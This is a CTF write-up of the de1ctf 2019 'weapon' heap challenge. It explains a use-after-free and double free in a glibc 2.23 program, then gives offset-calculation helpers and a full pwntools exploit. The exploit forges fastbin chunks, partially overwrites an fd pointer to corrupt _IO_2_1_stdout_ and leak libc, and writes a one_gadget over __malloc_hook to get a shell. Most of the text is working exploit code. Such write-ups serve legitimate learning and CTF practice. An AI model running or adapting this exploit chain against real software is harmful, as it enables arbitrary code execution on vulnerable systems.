I didn't solve this one (wtcl, I'm too weak); I only found the approach after reading the other players' writeups, and learned a lot from it.
How to put it: the challenge is simple but clever, and reversing it is almost effortless.
The bug is in the free function: a plain UAF (the slot pointer is not cleared after free, so a freed chunk can still be edited).
Now, my initial line of thinking.
Since the program has no show function, it is almost certain we have to attack _IO_2_1_stdout_: change its flags and leak libc that way.
But add only allows requests of at most 0x60 (fastbin-sized chunks), so there is no leftover unsorted-bin pointer to be found anywhere.
And then... I was out of ideas.
So I studied the writeups.
Besides the UAF there is a second small bug: the index is chosen by the user, and any index from 0 to 9 can be requested.
That is what makes forging an unsorted-bin chunk possible.
Idea: to get an unsorted-bin pointer we first need a chunk in the 0x70 fastbin (a 0x60 request), and then the very same chunk has to go into the unsorted bin. Its fastbin fd is then left holding the unsorted bin's fd (main_arena+88, a libc pointer), and with a partial overwrite of that fd we can attack _IO_2_1_stdout_.
After that it is the standard __malloc_hook hijack.
Let me record the intermediate steps in detail.
First forge a chunk header, so that we can modify the control information (the size field) of the next chunk.
```python
add(0x10,0,'aaaaaaaa')   # chunk at heap+0x00, size 0x21
add(0x10,1,'bbbbbbbb')   # chunk at heap+0x20, size 0x21
add(0x60,2,'cccccccc')   # chunk at heap+0x40, size 0x71
add(0x10,3,'dddddddd')   # chunk at heap+0xb0, size 0x21

free(0)
free(1)
free(0)                  # fastbin 0x20: 0 -> 1 -> 0 (double free via the UAF)

add(0x10,0,p64(0) + p64(0x21))   # p64(0x21) lands at heap+0x18: size of a fake chunk at heap+0x10
add(0x60,8,'eeeeeeee')

edit(1,'\x10')           # chunk 1 is still in the fastbin: its fd (heap+0x00) becomes heap+0x10
```
This way we get an allocation at heap offset 0x10, whose user data overlaps the header of the chunk at 0x20 (index 1). We first change its size to 0x71 and free it, then change it to an unsorted-bin size and free it again; that leaves a leftover libc pointer (main_arena+88) in the chunk's fd.
```python
add(0x10,1,'aaaaaaaa')            # takes chunk 1 back out of the 0x20 fastbin
add(0x10,4,p64(0) + p64(0x71))    # takes the fake chunk at heap+0x10; writes chunk 1's header: size 0x71

edit(2,0x40 * 'a' + p64(0) + p64(0x71)) # bypass free check: the next chunk size cannot equal to 0

free(1)                           # chunk 1 (now 0x70) goes into the 0x70 fastbin
```
Editing chunk 2 writes a valid size (0x71) at heap+0x90, the chunk following the now 0x70-sized chunk 1; free() checks the next chunk's size and aborts with "invalid next size (fast)" if it is 0.
Next, the fastbin picks up the unsorted bin's fd pointer.
```python
edit(4,p64(0) + p64(0x91)) # to change the chunk size: 0x90 is beyond the fastbin range
free(1)                    # now , fast fd has connected unsorted bin fd (main_arena+88)
```
From here on it is the standard routine.
Allocate at the address whose low two bytes are '\xdd\x*5' (i.e. ...*5dd, which is _IO_2_1_stdout_ - 0x43); the '*' nibble depends on the ASLR base and has to be brute-forced, a 1/16 chance, so just wrap the whole thing in a try/except loop.
```python
edit(1,'\xdd\x65')                # partial overwrite of the fd: main_arena+88 -> _IO_2_1_stdout_-0x43 (nibble 6 guessed)
edit(4,p64(0) + p64(0x71))        # don't forget to renew size, or malloc's fastbin size check fails
payload = 3 * 'a' + p64(0) * 6 + p64(0xfbad1800) # change flags
payload += p64(0) * 3 + '\x00'    # make _IO_write_base smaller (clear its low byte)
add(0x60,5,'lemon')               # takes chunk 1 out of the 0x70 fastbin
add(0x60,6,payload)               # takes the fake chunk inside libc and overwrites _IO_2_1_stdout_
```
libc is leaked successfully. The first 0x7f-terminated value that comes out is stdout's own _IO_write_base (now _IO_2_1_stdout_ - 0x20); subtracting 192 gives _IO_2_1_stderr_ in this libc build, which is why the exploit names it that way. What follows is the usual __malloc_hook - 0x23.
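The two-byte fd overwrite, the _IO_2_1_stdout_ payload layout and the leak parsing above, worked through as an added Python example (not part of the original exploit). It assumes the symbol offsets of the Ubuntu 16.04 libc-2.23 build (_IO_2_1_stdout_ = 0x3c5620, _IO_2_1_stderr_ = 0x3c5540, main_arena = 0x3c4b20) and an example libc base; the flushed byte stream it parses is constructed to match what the overwritten stdout would print, not a capture.

```python
import struct

# Assumed symbol offsets for the Ubuntu 16.04 libc-2.23 build the exploit
# targets; verify with `readelf -s libc-2.23.so`.
STDOUT_OFF = 0x3c5620       # _IO_2_1_stdout_
STDERR_OFF = 0x3c5540       # _IO_2_1_stderr_
MAIN_ARENA_OFF = 0x3c4b20   # main_arena; the unsorted bin head is main_arena + 88
FAKE_CHUNK_DELTA = 0x43     # the fake 0x7f-sized chunk sits at _IO_2_1_stdout_ - 0x43


def p64(v):
    return struct.pack('<Q', v)


def u64(b):
    return struct.unpack('<Q', b.ljust(8, b'\x00'))[0]


def fd_partial_overwrite(guess_nibble):
    """Two bytes written over a fastbin fd that currently holds main_arena+88.

    main_arena+88 and _IO_2_1_stdout_-0x43 differ only in their low 16 bits
    (assuming no carry into the third byte).  The low 12 bits of the fake chunk
    are fixed by the libc layout (0x5dd); the remaining nibble comes from the
    page-aligned ASLR base and has to be guessed, hence 1/16.
    """
    target_low12 = (STDOUT_OFF - FAKE_CHUNK_DELTA) & 0xfff   # 0x5dd
    return struct.pack('<H', (guess_nibble << 12) | target_low12)


def correct_nibble(libc_base):
    """The nibble a given libc base would need (only known after the fact)."""
    return ((libc_base + STDOUT_OFF - FAKE_CHUNK_DELTA) >> 12) & 0xf


def stdout_leak_payload():
    """Content for the fake chunk at _IO_2_1_stdout_-0x43 (user data starts at
    _IO_2_1_stdout_-0x33): 0xfbad1800 over _flags, zero _IO_read_ptr/_end/_base,
    then clear the low byte of _IO_write_base so the next flush dumps libc memory."""
    payload = b'a' * 3             # -0x33 .. -0x30
    payload += p64(0) * 6          # -0x30 .. 0x00: tail of _IO_2_1_stderr_, not needed
    payload += p64(0xfbad1800)     # _flags
    payload += p64(0) * 3          # _IO_read_ptr, _IO_read_end, _IO_read_base
    payload += b'\x00'             # low byte of _IO_write_base
    return payload


def payload_layout(libc_base):
    """Absolute address of each field the payload touches, for checking offsets."""
    user = libc_base + STDOUT_OFF - FAKE_CHUNK_DELTA + 0x10
    flags = user + 3 + 8 * 6
    return {'_flags': flags, '_IO_write_base_low_byte': flags + 8 + 8 * 3}


def constructed_flush(libc_base):
    """Constructed sample (not a real capture) of what stdout prints after the
    overwrite: memory from the new _IO_write_base (_IO_2_1_stdout_-0x20) onward."""
    stdout = libc_base + STDOUT_OFF
    write_base = stdout - 0x20
    return (b'\x00' * 0x20 + p64(0xfbad1800) + p64(0) * 3 + p64(write_base)
            + p64(stdout + 0x83))  # _IO_write_ptr follows; its value here is illustrative


def parse_leak(stream):
    """Same as p.recvuntil('\\x7f')[-6:]: the first 0x7f-terminated pointer."""
    idx = stream.index(b'\x7f')
    return u64(stream[idx - 5: idx + 1])


def libc_base_from_leak(leaked):
    """The leaked value is stdout's _IO_write_base, i.e. _IO_2_1_stdout_-0x20.
    The exploit subtracts 192 and treats the result as _IO_2_1_stderr_; both
    give the same base because _IO_2_1_stdout_ - _IO_2_1_stderr_ == 0xe0 here."""
    base_from_stdout = leaked + 0x20 - STDOUT_OFF
    base_from_stderr = (leaked - 192) - STDERR_OFF
    assert base_from_stdout == base_from_stderr
    return base_from_stdout


if __name__ == '__main__':
    base = 0x7f1234567000                      # example base, not a real one
    print('fd overwrite for nibble 6:', fd_partial_overwrite(6))
    print('nibble this base needs:', hex(correct_nibble(base)))
    leak = parse_leak(constructed_flush(base))
    print('leak:', hex(leak), 'libc base:', hex(libc_base_from_leak(leak)))
```

The `assert` in `libc_base_from_leak` is the check worth keeping in a real exploit: if the two formulas disagree, the leak is not the pointer you think it is.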
```python
libc = ELF('./libc-2.23.so')
# first 0x7f-terminated pointer printed is stdout's _IO_write_base (_IO_2_1_stdout_ - 0x20);
# minus 192 it is _IO_2_1_stderr_ in this libc build
_IO_2_1_stderr_ = u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00')) - 192
libc_base = _IO_2_1_stderr_ - libc.sym['_IO_2_1_stderr_']
__malloc_hook = libc_base + libc.sym['__malloc_hook']
one_gadget_list = [0x45216,0x4526a,0xf02a4,0xf1147]
one_gadget = libc_base + one_gadget_list[3]
print "[*] one_gadget:",hex(one_gadget)
add(0x60,5,'lemon')                   # fresh 0x70 chunk (the fastbin is empty now)
free(5)
payload = 0x13 * 'a' + p64(one_gadget)
edit(5,p64(__malloc_hook - 0x23))     # fastbin fd -> fake chunk whose size byte is 0x7f
add(0x60,5,'\x10')                    # takes chunk 5 back
add(0x60,0,payload)                   # takes the fake chunk; user data + 0x13 == __malloc_hook
add(0x20,3,'hack')                    # malloc() calls __malloc_hook -> one_gadget
gdb.attach(p)
p.interactive()
```
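Where the 0x23 comes from (and, by the same method, the 0x43 for stdout): a scan for byte positions that would pass the glibc 2.23 fastbin size check. This is an added example, not code from the writeup; it assumes __malloc_hook = 0x3c4b10 in the same Ubuntu 16.04 libc-2.23 build and runs on a constructed image of the memory around __malloc_hook, shaped like that libc (libc pointers beside zero words), so the hits it reports illustrate the method rather than being read from a real process.

```python
import struct

# Assumed symbol offset for the Ubuntu 16.04 libc-2.23 build; verify with readelf.
MALLOC_HOOK_OFF = 0x3c4b10


def p64(v):
    return struct.pack('<Q', v)


def fastbin_index(size):
    """glibc 2.23 fastbin_index() on x86-64, applied after chunksize() has
    masked off the three flag bits."""
    return ((size & ~0x7) >> 4) - 2


def find_fake_fast(mem, mem_base, request):
    """Every offset in the image that survives the 2.23 _int_malloc check
    `fastbin_index(chunksize(victim)) != idx` for the bin serving malloc(request).

    Returns (chunk_addr, user_addr) pairs; a freed fastbin chunk's fd can be
    pointed at any chunk_addr in the list.  The two constants in the writeup,
    _IO_2_1_stdout_-0x43 and __malloc_hook-0x23, are instances of this scan.
    """
    chunk_size = max((request + 8 + 15) & ~15, 0x20)   # request 0x60 -> 0x70 chunk
    idx = fastbin_index(chunk_size)
    hits = []
    for off in range(0, len(mem) - 16 + 1):
        size = struct.unpack_from('<Q', mem, off + 8)[0]
        if fastbin_index(size) == idx:
            hits.append((mem_base + off, mem_base + off + 0x10))
    return hits


def pick_chunk(hits, target, request):
    """Keep only fake chunks whose writable user area (request bytes from
    user_addr) covers the 8-byte target we want to overwrite."""
    return [(c, u) for c, u in hits if u <= target and target + 8 <= u + request]


def hook_payload(user_addr, hook_addr, one_gadget):
    """Content for the fake chunk: pad from user_addr up to __malloc_hook,
    then the gadget address."""
    return b'a' * (hook_addr - user_addr) + p64(one_gadget)


def constructed_hook_area(libc_base):
    """Constructed 0x40-byte image of memory from __malloc_hook-0x30 onward
    (not a capture): libc pointers next to zero words, as in this build.
    A pointer's 0x00007f.. high bytes are what produce a 0x7f size field."""
    hook = libc_base + MALLOC_HOOK_OFF
    words = [
        0, 0,                    # __malloc_hook-0x30, -0x28
        libc_base + 0x3c3260,    # -0x20: pointer into libc data
        0,                       # -0x18
        libc_base + 0x85e20,     # -0x10: __memalign_hook
        libc_base + 0x85a00,     # -0x08: __realloc_hook
        0, 0,                    # __malloc_hook, __malloc_hook+8
    ]
    return hook - 0x30, b''.join(p64(w) for w in words)


if __name__ == '__main__':
    base = 0x7f1234567000                      # example base, not a real one
    hook = base + MALLOC_HOOK_OFF
    mem_base, mem = constructed_hook_area(base)
    for chunk, user in find_fake_fast(mem, mem_base, 0x60):
        print('fake chunk at __malloc_hook%+#x, user data at __malloc_hook%+#x'
              % (chunk - hook, user - hook))
    chunk, user = pick_chunk(find_fake_fast(mem, mem_base, 0x60), hook, 0x60)[0]
    print('filler length:', hex(hook - user))   # 0x13 for __malloc_hook-0x23
```

The scan also reports a second candidate at __malloc_hook-0xb (its size byte comes from the high byte of __realloc_hook), but its user data would start past __malloc_hook, which is why `pick_chunk` rejects it and the exploit uses -0x23.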
Full exploit (Python 2 pwntools):
```python
from pwn import *

'''
author: lemon
date: 2020-10-16
libc version: libc-2.23.so
'''

local = 1

binary = "./de1ctf_2019_weapon"


def dbg():
    context.log_level = 'debug'

context.terminal = ['tmux','splitw','-h']


def add(size,index,content):
    p.sendlineafter('choice >> ','1')
    p.sendlineafter('wlecome input your size of weapon: ',str(size))   # typo is the binary's own prompt
    p.sendlineafter('input index:',str(index))
    p.sendafter('input your name:',content)

def free(index):
    p.sendlineafter('choice >> ','2')
    p.sendlineafter('input idx :',str(index))

def edit(index,content):
    p.sendlineafter('choice >>','3')
    p.sendlineafter('input idx:',str(index))
    p.sendafter('new content:',content)

# the fd nibble guess succeeds 1/16 of the time, so retry until it does
while True:
    try:
        if local == 1:
            p = process(binary)
        else:
            p = remote("node3.buuoj.cn",26759)
        add(0x10,0,'aaaaaaaa')
        add(0x10,1,'bbbbbbbb')
        add(0x60,2,'cccccccc')
        add(0x10,3,'dddddddd')

        free(0)
        free(1)
        free(0)                          # double free: fastbin 0x20 is 0 -> 1 -> 0

        add(0x10,0,p64(0) + p64(0x21))   # size field of a fake chunk at heap+0x10
        add(0x60,8,'eeeeeeee')

        edit(1,'\x10')                   # chunk 1's fd -> heap+0x10

        add(0x10,1,'aaaaaaaa')
        add(0x10,4,p64(0) + p64(0x71))   # overlaps chunk 1's header: size 0x71

        edit(2,0x40 * 'a' + p64(0) + p64(0x71)) # bypass free check: the next chunk size cannot equal to 0

        free(1)                          # into the 0x70 fastbin

        edit(4,p64(0) + p64(0x91)) # to change the chunk size
        free(1) # now , fast fd has connected unsorted bin fd

        edit(1,'\xdd\x65')               # partial overwrite: fd -> _IO_2_1_stdout_ - 0x43 (nibble guessed)
        edit(4,p64(0) + p64(0x71)) # don't forget to renew size

        payload = 3 * 'a' + p64(0) * 6 + p64(0xfbad1800) # change flags
        payload += p64(0) * 3 + '\x00' # make _IO_write_base smaller

        add(0x60,5,'lemon')
        add(0x60,6,payload)              # overwrites _IO_2_1_stdout_, next flush leaks libc


        libc = ELF('./libc-2.23.so')
        _IO_2_1_stderr_ = u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00')) - 192
        libc_base = _IO_2_1_stderr_ - libc.sym['_IO_2_1_stderr_']

        __malloc_hook = libc_base + libc.sym['__malloc_hook']

        one_gadget_list = [0x45216,0x4526a,0xf02a4,0xf1147]
        one_gadget = libc_base + one_gadget_list[3]
        print "[*] one_gadget:",hex(one_gadget)

        add(0x60,5,'lemon')
        free(5)

        payload = 0x13 * 'a' + p64(one_gadget)

        edit(5,p64(__malloc_hook - 0x23)) # fastbin fd -> fake 0x7f chunk before __malloc_hook
        add(0x60,5,'\x10')
        add(0x60,0,payload)              # writes one_gadget over __malloc_hook

        add(0x20,3,'hack')               # trigger

        gdb.attach(p)
        p.interactive()
        break

    except Exception as e:
        print(e)
        p.close()
        continue
```